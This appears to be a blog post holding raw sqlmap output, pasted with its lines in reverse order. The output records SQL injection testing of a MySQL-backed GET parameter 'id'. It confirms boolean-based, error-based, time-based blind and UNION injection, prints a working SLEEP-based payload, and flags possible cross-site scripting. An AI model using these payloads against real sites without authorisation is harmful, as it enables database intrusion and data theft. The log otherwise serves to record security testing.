Title: Generic UNION query (NULL) - 3 columns Payload: id=1') AND (SELECT 4859 FROM (SELECT(SLEEP(5)))PGQv) AND ('GEhj'='GEhj Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Title: AND boolean-based blind - WHERE or HAVING clause Sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests: Do you want to keep testing the others (if any)? y GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable target URL appears to have 3 columns in query Automatically extending the range for current UNION query injection technique test This should reduce the time needed to find the right number of query columns. 'ORDER BY' technique appears to be usable. automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found testing 'Generic UNION query (NULL) - 1 to 20 columns' GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable time-based comparison requires larger statistical model, please wait. testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' GET parameter 'id' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with -string="Your") testing 'AND boolean-based blind - WHERE or HAVING clause' Do you want to skip test payloads specific for other DBMSes? yįor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? n It looks like the back-end DBMS is 'MySQL'. testing for SQL injection on GET parameter 'id' heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') GET parameter 'id' appears to be dynamic testing if GET parameter 'id' is dynamic testing if the target URL content is stable checking if the target is protected by some kind of WAF/IPS
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |